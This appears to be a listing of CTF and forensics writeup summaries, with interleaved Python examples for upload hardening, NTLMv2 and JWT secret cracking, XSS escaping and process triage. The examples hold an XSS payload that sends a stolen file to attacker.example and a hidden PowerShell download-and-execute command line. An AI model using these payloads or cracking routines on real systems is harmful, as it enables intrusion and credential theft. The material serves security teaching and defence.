
CTF-Writeup

Found 42 related articles.

  • 2025-03-23

    Volatility3 Analysis of STRELASTEALER via Rundll32 Proxy Execution

    Detailed forensic analysis of a Windows memory dump using Volatility3 to investigate a compromise at a financial institution. The analysis identifies a hidden malicious PowerShell process (powershell.exe -windowstyle hidden) that abuses WebDAV to fetch a second-stage payload (3435.dll), which is then executed through rundll32.exe, matching MITRE ATT&CK sub-technique T1218.011 (System Binary Proxy Execution: Rundll32). The investigation determines the attacker's C2 IP (45.9.74.32) and the compromised user ('Elon'), and correlates the C2 infrastructure with the STRELASTEALER malware family.

    CTF-Writeup Forensics-Analysis Endpoint-Security
  • 2025-03-11

    ApiBase - API Endpoint Enumeration and Privilege Escalation

    Technical writeup detailing the compromise of a DockerLabs API-based system. Methodology includes Nmap scanning, API endpoint enumeration (GET/POST methods), credential brute-forcing via Caido, file transfer (SCP), and PCAP network analysis using Wireshark to extract critical credentials for root access.

    CTF-Writeup API-Security Forensics
  • 2025-03-08

    Dog - Active Machine Writeup (Content Withheld)

    Content is currently withheld as per HackTheBox policy, since Dog is an active machine. This writeup details the full exploitation path from initial access to root, likely involving web application vulnerabilities, service enumeration, and local privilege escalation.

    CTF-Writeup Content-Withheld-Active
  • 2025-03-03

    Internship - Multi-Stage Exploitation via SQLi and Steganography

    Technical writeup covering the multi-stage compromise of the 'Internship' challenge. The methodology progresses from SQL Injection authentication bypass and user data extraction to a targeted SSH brute-force attack (Hydra). Privilege escalation involves modifying a script to move laterally to another user account, culminating in steganography analysis (Steghide) that yields the material needed for final root access.

    CTF-Writeup Web-Vulnerabilities Linux-Privesc
  • 2025-03-02

    EscapeTwo - Active Machine Writeup (Content Withheld)

    Content is currently withheld as per HackTheBox policy, since EscapeTwo is an active machine. This writeup details the full exploitation path from initial access to full control of the target, likely involving service enumeration, misconfigurations, and privilege escalation.

    CTF-Writeup Content-Withheld-Active
  • 2025-02-23

    The Crime - Mobile Forensics with ALEAPP to Reconstruct a Crime Timeline

    Detailed mobile forensics writeup solving a murder case by analyzing an extracted Android device using ALEAPP. The analysis successfully traces the victim's final actions, identifying the primary financial stressor (Olymptrade and a 250,000 EGP debt owed to 'Shady Wahab'), the victim's final known location ('The Nile Ritz-Carlton'), planned escape route ('Las Vegas' flight ticket), and a final scheduled meeting location ('The Mob Museum') based on Discord chat logs.

    CTF-Writeup Forensics-Analysis Endpoint-Security Blue-Team
  • 2025-02-19

    Titanic - Active Machine Writeup (Content Withheld)

    Content is currently withheld as per HackTheBox policy, since Titanic is an active machine. This writeup details the full exploitation path from initial access to root, likely involving web vulnerabilities, service enumeration, and local privilege escalation.

    CTF-Writeup Content-Withheld-Active
  • 2025-02-19

    UnderPass - Active Machine Writeup (Content Withheld)

    Content is currently withheld as per HackTheBox policy, since UnderPass is an active machine. This writeup details the full exploitation path from initial access to root, likely involving web vulnerabilities, service misconfigurations, and local privilege escalation.

    CTF-Writeup Content-Withheld-Active
  • 2025-02-19

    Instant - APK Decompilation, LFI via Swagger API, and Solar-PuTTY Backup Decryption

    Technical writeup detailing the compromise of the Instant machine. Initial foothold is achieved through static analysis of a downloadable APK file, revealing subdomains and a hardcoded API key. This key is used to exploit a Local File Inclusion (LFI) vulnerability within the authenticated Swagger API (via the logs reading function), leading to SSH key exfiltration and user access. Privilege escalation is achieved by locating, transferring, and decrypting an encrypted Solar-PuTTY sessions backup file, which yields the root password.

    CTF-Writeup Mobile-Security Web-Exploitation Linux-Privesc
  • 2025-02-17

    Network Forensics of LLMNR/NBT-NS Poisoning Attacks

    Detailed network forensics writeup investigating an LLMNR/NBT-NS poisoning incident using Wireshark. The analysis tracks the attack chain, identifying the initial mistyped network query (FILESHAARE), the attacker's rogue IP (192.168.232.215), the compromised user (janesmith) whose NTLM hash was intercepted via SMB, and the hostname of the accessed machine (AccountingPC), demonstrating the vulnerability of unauthenticated name resolution protocols.

    CTF-Writeup Forensics-Analysis Network-Security Blue-Team
  • 2025-02-06

    WebStrike - Network Forensics of Web Shell Upload and Data Exfiltration

    Detailed network forensics writeup analyzing a PCAP file to investigate a web shell incident. The analysis successfully identifies the attack's origin (Tianjin, China), the attacker's User-Agent, and the exploitation of a file upload vulnerability to deploy a malicious web shell ('image.jpg.php' in the /reviews/uploads/ directory). Further investigation reveals the attacker's attempt to establish a reverse shell to port 8080 and the subsequent data exfiltration of the sensitive /etc/passwd file.

    CTF-Writeup Forensics-Analysis Web-Security Blue-Team
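The double-extension upload described above ('image.jpg.php' accepted because the filename contains '.jpg') is the kind of check that is easiest to understand next to its hardened form. The following is an added example and is not code from the WebStrike challenge or the writeup: the upload directory (/reviews/uploads/), the attacker IP, and the access-log lines are constructed to mirror the summary, and the `ALLOWED` set is an assumed allowlist for an image-only form.

```python
"""Upload filename handling: the double-extension bypass beside a hardened check, plus an access-log scan for the deployed shell."""
import os
import re
import secrets

ALLOWED = {"jpg", "jpeg", "png", "gif"}   # assumed allowlist for an image upload form


def accept_vulnerable(filename: str) -> bool:
    # Looks for an allowed extension anywhere in the name, so 'image.jpg.php' passes
    # and Apache will still hand the file to the PHP handler because of its final extension.
    return any(f".{ext}" in filename.lower() for ext in ALLOWED)


def stored_name_safe(filename: str):
    """Return a server-chosen name to store the file under, or None to reject.

    Only the final extension is compared against the allowlist, path separators and NUL
    bytes are refused, and the stored name is random so the attacker cannot predict
    (and therefore cannot request) the path of what they uploaded.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in base or base != filename:
        return None
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED:
        return None
    return f"{secrets.token_hex(16)}.{ext}"


# Requests for server-side executable files under the upload directory: this is how a
# deployed web shell shows up in the web server's access log after the upload itself.
UPLOAD_EXEC = re.compile(r'"(?:GET|POST) (/reviews/uploads/[^" ]+\.(?:php\d?|phtml|phar)[^" ]*) HTTP')


def webshell_requests(log_lines):
    return [m.group(1) for line in log_lines if (m := UPLOAD_EXEC.search(line))]


# Constructed access-log lines (not from the challenge PCAP)
ACCESS_LOG = [
    '198.51.100.23 - - [06/Feb/2024:08:03:11 +0000] "POST /reviews/upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [06/Feb/2024:08:03:15 +0000] "GET /reviews/uploads/image.jpg.php?cmd=id HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [06/Feb/2024:08:03:40 +0000] "GET /reviews/uploads/logo.png HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("vulnerable accepts image.jpg.php:", accept_vulnerable("image.jpg.php"))
    print("hardened stores image.jpg.php as:", stored_name_safe("image.jpg.php"))
    print("web shell hits:", webshell_requests(ACCESS_LOG))
```

Even with the hardened check, the upload directory should be served with PHP execution disabled (or from a separate host) so that a future bypass cannot become code execution.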
  • 2025-01-30

    UFO-1 - Sandworm Team (APT44) MITRE ATT&CK TTP Analysis

    Research writeup focusing on the Sandworm Team (APT44), a highly aggressive Russian APT group, using the MITRE ATT&CK framework. Analysis covers their TTPs, critical infrastructure attacks (e.g., 2016 Ukraine power grid, 2022 SCADA attacks), key malware (e.g., Industroyer2, NotPetya, Exaramel), persistence methods, and specific tools used for code execution and data destruction.

    CTF-Writeup Threat-Intelligence Blue-Team
  • 2025-01-26

    Noxious - LLMNR Poisoning and NTLMv2 Hash Cracking

    Network forensics writeup detailing the analysis of an LLMNR poisoning attack. The process covers identifying the rogue device via LLMNR and DHCP traffic, locating the victim's credential leak (NTLMv2 hash) within SMB Session Setup packets, extracting NTLM Challenge/Response components, and performing hash cracking with Hashcat to recover the plaintext password, providing full context on the credential theft incident.

    CTF-Writeup Network-Forensics Threat-Analysis Blue-Team
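Both this entry and the LLMNR/NBT-NS forensics entry above end at the same two steps: deciding which host is the poisoner, and turning the NTLMSSP fields pulled out of the SMB Session Setup packet into something a cracker can test. The block below is an added example, not code from either writeup: the LLMNR events, user ('jdoe'), domain ('CORP'), server challenge, blob and password are all constructed, and the MD4 routine is included in pure Python because `hashlib.new('md4')` depends on OpenSSL's legacy provider and is missing on many current systems. The NTLMv2 computation follows MS-NLMP and the output line uses the `user::domain:challenge:ntproofstr:blob` layout hashcat reads for mode 5600.

```python
"""Rebuild an NTLMv2 challenge/response from captured fields and test it against a wordlist; spot the LLMNR poisoner."""
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), needed for the NT hash."""
    M = 0xFFFFFFFF
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & M
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):
            a = rol((a + F(b, c, d) + X[i]) & M, (3, 7, 11, 19)[i % 4]); a, b, c, d = d, a, b, c
        for i in range(16):
            k = (i % 4) * 4 + i // 4
            a = rol((a + G(b, c, d) + X[k] + 0x5A827999) & M, (3, 5, 9, 13)[i % 4]); a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):
            a = rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & M, (3, 9, 11, 15)[i % 4]); a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & M, (b + bb) & M, (c + cc) & M, (d + dd) & M
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    # MS-NLMP: HMAC_MD5(NT hash, UTF-16LE(UPPER(user) + domain)); the domain keeps its case
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof_str(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    # NTProofStr = HMAC_MD5(NTOWFv2, ServerChallenge || blob); the blob is the "NTLMv2 Response" minus its first 16 bytes
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def hashcat_5600(user: str, domain: str, server_challenge: bytes, ntproofstr: bytes, blob: bytes) -> str:
    return f"{user}::{domain}:{server_challenge.hex()}:{ntproofstr.hex()}:{blob.hex()}"


def crack_5600(line: str, wordlist):
    """Dictionary attack: recompute NTProofStr per candidate and compare with the captured value."""
    user, _, domain, chal, proof, blob = line.split(":")
    chal, proof, blob = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof_str(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


def llmnr_responders(events, min_names=2):
    """A host answering LLMNR for several unrelated (even mistyped) names is a poisoner; events are (src_ip, name, is_response)."""
    answered = {}
    for src, name, is_response in events:
        if is_response:
            answered.setdefault(src, set()).add(name.upper())
    return sorted(ip for ip, names in answered.items() if len(names) >= min_names)


# Constructed stand-ins for the fields read out of the NTLMSSP_CHALLENGE / NTLMSSP_AUTH packets
CAPTURED_USER, CAPTURED_DOMAIN = "jdoe", "CORP"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = (bytes.fromhex("0101000000000000")            # response version, reserved
        + bytes.fromhex("00d0c9a1c5e4da01")           # timestamp
        + bytes.fromhex("aabbccddeeff0011")           # client challenge
        + b"\x00" * 4                                 # reserved
        + bytes.fromhex("0200080043004f0052005000")   # AV pair: NetBIOS domain "CORP"
        + b"\x00" * 4 + b"\x00" * 4)                  # AV terminator, reserved

# Constructed LLMNR traffic: one host answers every name, including the typo
LLMNR_EVENTS = [("192.0.2.20", "FILESHAARE", False), ("192.0.2.50", "FILESHAARE", True),
                ("192.0.2.21", "wpad", False), ("192.0.2.50", "wpad", True),
                ("192.0.2.22", "PRNTSRV01", False), ("192.0.2.50", "PRNTSRV01", True)]


def build_sample_capture(password: str = "Summer2024!") -> str:
    """Produce the hashcat line a capture of this (constructed) authentication would yield."""
    proof = nt_proof_str(password, CAPTURED_USER, CAPTURED_DOMAIN, SERVER_CHALLENGE, BLOB)
    return hashcat_5600(CAPTURED_USER, CAPTURED_DOMAIN, SERVER_CHALLENGE, proof, BLOB)


if __name__ == "__main__":
    print("poisoner:", llmnr_responders(LLMNR_EVENTS))
    line = build_sample_capture()
    print(line)
    print("cracked:", crack_5600(line, ["password", "Welcome1", "Summer2024!"]))
```

The `crack_5600` loop exists to show exactly what hashcat does per candidate; for a real capture, write the line to a file and run hashcat with `-m 5600`, which is orders of magnitude faster.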
  • 2024-12-05

    TheStickerShop - Stored XSS Leading to Data Exfiltration

    Technical writeup detailing the compromise of TheStickerShop. The primary vulnerability exploited is a Stored Cross-Site Scripting (XSS) vulnerability in the 'Feedback' form on the Python/Werkzeug web server (8080/tcp). Requesting the restricted 'flag.txt' directly returns 401 Unauthorized, so the attack plants a JavaScript payload that runs in the browser of the staff member who reviews feedback: it fetches 'flag.txt' with that user's session, Base64-encodes the content, and exfiltrates it to an attacker-controlled HTTP server through an Image object request.

    CTF-Writeup Web-Exploitation JavaScript-Exploitation
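The entry above describes the three pieces of a stored-XSS data theft: the page that echoes untrusted feedback, the payload that runs in the reviewer's browser, and the attacker-side log where the Base64 data lands. The block below is an added example written for this listing and is not the challenge's code: the rendering functions are a stand-in for the Werkzeug view, the `attacker.example` host, the flag value, and the listener log lines are constructed, and the CSP values are a suggested hardening, not something the writeup reports.

```python
"""Feedback rendering: the injectable version beside its escaped form, plus decoding what the payload exfiltrated."""
import base64
import html
import re
from urllib.parse import parse_qs, urlparse

# Constructed payload of the kind the feedback form stores: fetch a page the reviewer's
# session can read, base64 it, and smuggle it out as an image request to the attacker.
XSS_PAYLOAD = ("<script>fetch('/flag.txt').then(r=>r.text()).then(t=>{"
               "new Image().src='http://attacker.example/?c='+btoa(t)})</script>")


def render_feedback_vulnerable(entries):
    # User text is concatenated straight into the HTML the reviewer loads: stored XSS.
    return "<ul>" + "".join(f"<li>{e}</li>" for e in entries) + "</ul>"


def render_feedback_safe(entries):
    # Contextual output encoding: '<', '>', '&' and quotes become entities, so the payload is inert text.
    return "<ul>" + "".join(f"<li>{html.escape(e, quote=True)}</li>" for e in entries) + "</ul>"


def security_headers():
    """Defence in depth (suggested values): a CSP without 'unsafe-inline' blocks the inline script
    even if encoding is missed somewhere, and img-src 'self' closes the Image-based exfil channel."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; img-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


def recover_exfiltrated(log_lines, param="c"):
    """Decode the Base64 values an exfil payload appended to requests seen by the attacker's listener."""
    out = []
    for line in log_lines:
        m = re.search(r'"GET (\S+) HTTP', line)
        if not m:
            continue
        for v in parse_qs(urlparse(m.group(1)).query).get(param, []):
            # btoa() output is not URL-encoded by the payload, so any '+' arrives as a space after parse_qs
            try:
                out.append(base64.b64decode(v.replace(" ", "+"), validate=True).decode())
            except (ValueError, UnicodeDecodeError):
                pass
    return out


SAMPLE_FLAG = "FLAG{constructed_example}"
EXFIL_LOG = [  # constructed lines from the attacker-side HTTP listener
    f'203.0.113.9 - - [05/Dec/2024:10:14:02 +0000] "GET /?c={base64.b64encode(SAMPLE_FLAG.encode()).decode()} HTTP/1.1" 404 -',
    '203.0.113.9 - - [05/Dec/2024:10:14:02 +0000] "GET /favicon.ico HTTP/1.1" 404 -',
]

if __name__ == "__main__":
    print(render_feedback_vulnerable([XSS_PAYLOAD]))
    print(render_feedback_safe([XSS_PAYLOAD]))
    print(recover_exfiltrated(EXFIL_LOG))
```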
  • 2024-12-05

    Volatility3 Analysis of a Credential Stealer Trojan

    Detailed forensic analysis of a Windows memory dump compromised by the Amadey Trojan. This investigation utilizes Volatility3 to identify the main malicious process (lssass.exe, a lookalike of the legitimate lsass.exe), determine its location on the filesystem (the user's Temp folder), confirm its nature via VirusTotal, track its C2 network connections (41.75.84.12), and discover persistence mechanisms (Scheduled Tasks and DLL payload execution via rundll32.exe).

    CTF-Writeup Forensics-Analysis
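Both this Amadey entry and the STRELASTEALER/rundll32 entry above reduce to the same triage questions over a process listing: which process name is a near-miss of a system binary, what runs from a user-writable folder, which PowerShell was started with a hidden window, and which rundll32 is loading a DLL from somewhere it should not. The block below is an added example for this listing, not code from either writeup or from Volatility3: the `Proc` records are constructed to look like the output of the `windows.pslist` and `windows.cmdline` plugins, and the IP, DLL name, user and PIDs in `SAMPLE` are placeholders rather than the writeups' indicators.

```python
"""Triage rules over a process listing such as Volatility3 windows.pslist / windows.cmdline output."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str
    path: str      # image path on disk
    cmdline: str


# Names malware likes to imitate; a one-character spelling difference is a masquerade (T1036.005).
SYSTEM_NAMES = {"lsass.exe", "svchost.exe", "csrss.exe", "services.exe", "winlogon.exe", "explorer.exe"}
USER_WRITABLE = re.compile(r"\\(?:temp|appdata|users\\public|programdata)\\", re.I)
HIDDEN_WINDOW = re.compile(r"-w\w*\s+h\w*", re.I)             # -windowstyle hidden, -w hidden, -win h ...
UNC_PATH = re.compile(r"\\\\[\w.\-]+(?:@(?:ssl@)?\d+)?\\")      # \\host\share, or WebDAV-style \\host@80\share
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage(procs):
    """Return (pid, rule) findings; a process can trip several rules."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        name = p.name.lower()
        if name not in SYSTEM_NAMES and any(levenshtein(name, s) == 1 for s in SYSTEM_NAMES):
            findings.append((p.pid, "masquerade"))
        if USER_WRITABLE.search(p.path):
            findings.append((p.pid, "exec_from_user_writable"))
        if name == "powershell.exe" and HIDDEN_WINDOW.search(p.cmdline):
            findings.append((p.pid, "hidden_powershell"))
        if name == "rundll32.exe":
            # T1218.011: rundll32 loading a DLL from a network path or a user-writable directory
            if UNC_PATH.search(p.cmdline) or USER_WRITABLE.search(p.cmdline):
                findings.append((p.pid, "rundll32_proxy_exec"))
            parent = by_pid.get(p.ppid)
            if parent and parent.name.lower() in SCRIPT_HOSTS:
                findings.append((p.pid, "rundll32_from_script_host"))
    return findings


# Constructed process table (placeholders, not the writeups' indicators)
SAMPLE = [
    Proc(4, 0, "System", "", ""),
    Proc(640, 4, "lsass.exe", r"C:\Windows\System32\lsass.exe", r"C:\Windows\System32\lsass.exe"),
    Proc(2104, 1980, "explorer.exe", r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    Proc(4412, 2104, "powershell.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"powershell.exe -windowstyle hidden -c iex (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s')"),
    Proc(4520, 4412, "rundll32.exe", r"C:\Windows\System32\rundll32.exe",
         r"rundll32.exe \\198.51.100.7@80\davwwwroot\payload.dll,entry"),
    Proc(5100, 2104, "lssass.exe", r"C:\Users\bob\AppData\Local\Temp\lssass.exe",
         r"C:\Users\bob\AppData\Local\Temp\lssass.exe"),
]

if __name__ == "__main__":
    for pid, rule in triage(SAMPLE):
        print(pid, rule)
```

Feed real data by joining the PID column of `windows.pslist` with the command line from `windows.cmdline`; the rules are deliberately simple so that each hit is something an analyst can confirm by hand in the dump.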
  • 2024-12-04

    Vaccine - FTP, PKZIP/MD5 Cracking, SQL Injection via SQLMap, and sudo vi Privesc

    Technical writeup detailing the compromise of the Vaccine machine. Initial access is achieved by exploiting Anonymous FTP to retrieve a password-protected PKZIP file, cracking the PKZIP password and then the MD5 hash found inside to obtain web credentials. Authentication leads to exploiting a blind SQL Injection vulnerability via SQLMap, gaining an OS shell. Privilege escalation is completed by finding plaintext credentials for SSH access, then abusing the sudo rule that lets the user run 'vi' on a specific configuration file: the ':shell' command from inside vi spawns a root shell.

    CTF-Writeup Web-Exploitation Linux-Privesc
  • 2024-12-02

    Oopsie - IDOR, Arbitrary File Upload, and SUID Path Hijacking

    Technical writeup detailing the compromise of the Oopsie machine. Initial access involves exploiting an IDOR vulnerability to enumerate credentials, followed by cookie manipulation to gain access to an arbitrary file upload function for a PHP reverse shell. Privilege escalation is achieved by finding plaintext database credentials for SSH access, and finally, exploiting the SUID binary '/usr/bin/bugtracker' using a PATH hijacking technique to execute a root shell.

    CTF-Writeup Web-Vulnerabilities Linux-Privesc
  • 2024-11-28

    Archetype - SMB Credential Disclosure, MSSQL xp_cmdshell RCE, and SYSTEM Privileges via psexec

    Technical writeup detailing the compromise of the Archetype Windows machine. Initial foothold is achieved by exploiting Anonymous SMB access (445/tcp) to retrieve SQL credentials from a shared backup directory (prod.dtsConfig). These credentials are used to gain access to the MSSQL service (1433/tcp), where xp_cmdshell is enabled to achieve RCE and establish a reverse shell. Privilege escalation to NT AUTHORITY\SYSTEM is completed by hunting for credentials in the PowerShell history file and leveraging Impacket's psexec.py with the found administrator account.

    CTF-Writeup Windows-Exploitation Windows-Services SQL-Exploitation
  • 2024-11-27

    Alert - XSS to LFI, Hash Cracking, and Group Write Privilege Escalation

    Technical writeup detailing the compromise of the Alert Linux machine. Initial access is gained by chaining a Stored XSS vulnerability in the Markdown viewer to a Local File Inclusion (LFI) vulnerability in an internal /messages endpoint. LFI is used to exfiltrate an Apache MD5 hash from the .htpasswd file, which is then cracked via Hashcat to obtain SSH credentials for the 'albert' user. Privilege escalation is achieved by identifying a PHP process running as root out of a directory that is writable by the 'management' group, to which 'albert' belongs. The configuration.php file is modified to set the SUID bit on /bin/bash, granting a root shell.

    CTF-Writeup Web-Exploitation Linux-Privesc
  • 2024-11-23

    Responder - LFI/RFI Chain to NTLMv2 Hash Capture and WinRM Access

    Technical writeup detailing the initial compromise of the Responder machine. The attack chain involves exploiting a Local File Inclusion (LFI) vulnerability in a PHP application, escalating it to an RFI-style attack by injecting a UNC path to force an SMB authentication attempt. The resulting NTLMv2 hash is captured using the Responder tool, cracked with Hashcat, and used to gain full remote access via Evil-WinRM on port 5985.

    CTF-Writeup Web-Exploitation Windows-Services
  • 2024-11-21

    Three - S3 Bucket Misconfiguration and Remote Code Execution via AWS CLI

    Technical writeup detailing the compromise of the Three machine. The methodology involves identifying an exposed subdomain (s3.thetoppers.htb) pointing to an AWS S3 bucket that backs the website. Exploitation is achieved by leveraging a misconfigured access policy via the AWS CLI to upload a PHP webshell into the bucket. Remote Code Execution (RCE) is then established through the webshell, yielding a shell as the www-data user.

    CTF-Writeup Cloud-Security Web-Exploitation Linux-Services
  • 2024-11-20

    Crocodile - FTP Anonymous Login and Credential Disclosure

    Technical writeup detailing the compromise of the Crocodile machine. Initial access is achieved by exploiting the Anonymous FTP login vulnerability on the vsFTPd 3.0.3 service (21/tcp) to disclose files containing credentials (allowed.userlist and allowed.userlist.passwd). Web enumeration via Gobuster reveals a hidden '/login.php' endpoint. The disclosed 'admin' credentials are used to access the web panel and retrieve the flag, completing the box.

    CTF-Writeup Network-Exploitation Web-Exploitation
  • 2024-11-19

    Sequel - Exploiting Unauthenticated MariaDB Access (A07:2021)

    Technical writeup detailing the compromise of the Sequel machine. The methodology focuses on Nmap scanning to identify the exposed MariaDB service (version 10.3) on port 3306. The system is exploited due to a critical Identification and Authentication Failure (OWASP A07:2021) allowing unauthenticated root login. The process concludes with database enumeration (SHOW DATABASES, USE htb, SELECT * FROM config) to retrieve the flag.

    CTF-Writeup Network-Exploitation Linux-Services
  • 2024-11-18

    Appointment - Authentication Bypass via SQL Injection (SQLi)

    Technical writeup detailing the compromise of the Appointment machine. The primary vulnerability is an Authentication Bypass via SQL Injection (SQLi) affecting the web application's login form. Injecting the payload admin'# into the username field closes the string literal and comments out the remainder of the query, so the password check never runs and the attacker is logged in as admin without knowing a password, allowing the flag to be retrieved.

    CTF-Writeup Web-Exploitation SQL-Exploitation
  • 2024-11-06

    Whiterose - IDOR, EJS SSTI (CVE-2022-29078), and Sudoedit Bypass (CVE-2023-22809)

    Technical writeup detailing the compromise of the Whiterose machine. Initial access involves subdomain enumeration via wfuzz and exploiting an IDOR vulnerability to retrieve privileged user credentials. This leads to a Server-Side Template Injection (SSTI) RCE via CVE-2022-29078 (EJS template engine vulnerability). Privilege escalation is achieved by exploiting the sudoedit vulnerability CVE-2023-22809 to modify the /etc/sudoers file and gain root access.

    CTF-Writeup Web-Exploitation Linux-Privesc
  • 2024-10-31

    StellarJWT - JWT Exploitation and Chained sudo Privilege Escalation

    Technical writeup detailing the compromise of the 'StellarJWT' challenge. The methodology involves identifying and decoding an exposed JSON Web Token (JWT) for user enumeration, followed by a dictionary attack using Hydra for SSH access. Privilege escalation is achieved through a chain of sudo NOPASSWD rules: 'socat' for lateral movement to another user, then 'chown' to take ownership of '/etc/passwd' and modify it for final root access.

    CTF-Writeup Linux-Privesc Web-Exploitation
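The decoding step in the entry above relies on the fact that a JWT's header and claims are only Base64url-encoded, so anyone holding the token can read the user it names. The block below is an added example for this listing, not the challenge's code or the writeup's method, and it goes one step further than the entry: after decoding without verification it checks the HS256 signature against a secret list, which is what turns a readable token into a forgeable one. The token, claims, secret and candidate list are constructed.

```python
"""Decode a JWT without trusting it, then test its HS256 signature against candidate secrets."""
import base64
import hashlib
import hmac
import json


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))   # JWTs strip the '=' padding


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_unverified(token: str):
    """Header and claims are plain base64url: readable by anyone who sees the token (users, roles, expiry)."""
    h, p, _ = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def sign_hs256(header: dict, claims: dict, secret: bytes) -> str:
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode()) + "."
                     + b64url_encode(json.dumps(claims, separators=(",", ":")).encode()))
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_hs256(token: str, secret: bytes) -> bool:
    header, _ = decode_unverified(token)
    if header.get("alg") != "HS256":   # the verifier, not the token, decides the algorithm ('none', RS/HS confusion)
        return False
    signing_input, _, sig = token.rpartition(".")
    expected = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))


def crack_hs256(token: str, candidates):
    """Offline dictionary attack on the signing secret; hashcat mode 16500 does the same at scale."""
    for c in candidates:
        if verify_hs256(token, c.encode()):
            return c
    return None


# Constructed token (not from the challenge) signed with a deliberately weak secret
SAMPLE_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"},
                          {"sub": "stellar-admin", "role": "user", "iat": 1730000000},
                          b"secret123")

if __name__ == "__main__":
    print(decode_unverified(SAMPLE_TOKEN))
    print("secret:", crack_hs256(SAMPLE_TOKEN, ["password", "admin", "secret123"]))
```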
  • 2024-10-25

    Verdejo - SSTI Exploitation and base64 sudo Privesc Chain

    Technical writeup detailing the compromise of the 'Verdejo' challenge. Initial access is gained by exploiting a Server-Side Template Injection (SSTI) vulnerability in Jinja2 to obtain a reverse shell. Privilege escalation is achieved by abusing a sudo NOPASSWD rule for '/usr/bin/base64' to read root's SSH private key; the key's passphrase is then cracked with ssh2john and John the Ripper for final root access.

    CTF-Writeup Web-Vulnerabilities Linux-Privesc
  • 2024-10-21

    Chemistry - Pymatgen RCE (CVE-2024-23346), SSH Port Forwarding, and aiohttp LFI (CVE-2024-23334)

    Technical writeup detailing the compromise of the Chemistry machine. Initial access (RCE) is gained by exploiting CVE-2024-23346, an arbitrary code execution vulnerability in the pymatgen library via a malicious .CIF file upload, leading to a low-privileged shell. Privilege escalation is achieved by locating hidden credentials in a SQLite database, gaining SSH access, and then using SSH Port Forwarding to access an internal web service. The final step involves exploiting CVE-2024-23334, a critical path traversal vulnerability in aiohttp/3.9.1, to perform Local File Inclusion (LFI) and read the /etc/shadow file for root access.

    CTF-Writeup Remote-Code-Execution Web-Exploitation Linux-Privesc
  • 2024-10-20

    TwoMillion - API Enumeration, Information Disclosure, and Kernel Privilege Escalation (CVE-2023-0386)

    Technical writeup detailing the compromise of the TwoMillion machine. Initial access involves decoding ROT13-encoded data from JavaScript to find an API endpoint, followed by manipulating API parameters to grant the account administrator privileges (an Insecure Direct Object Reference (IDOR) in the admin API), which exposes a command injection used to obtain a reverse shell. Local Privilege Escalation is achieved by disclosing plaintext credentials from a '.env' file for SSH access, and finally exploiting the unpatched Linux kernel vulnerability CVE-2023-0386 (OverlayFS/FUSE) to gain root privileges.

    CTF-Writeup Web-Exploitation Linux-Privesc
  • 2024-10-20

    Cap - PCAP Analysis, FTP Credential Disclosure, and cap_setuid Privilege Escalation

    Technical writeup detailing the compromise of the Cap machine. Initial access is achieved by enumerating a web application that provides downloadable .PCAP network capture files. Tshark analysis of a specific PCAP file reveals FTP credentials in plaintext. These credentials are used to gain SSH access as the 'nathan' user. Privilege escalation to root is achieved by exploiting the 'cap_setuid' capability set on the /usr/bin/python3.8 binary, allowing arbitrary user ID change to 0 (root).

    CTF-Writeup Network-Exploitation Linux-Privesc
  • 2024-10-16

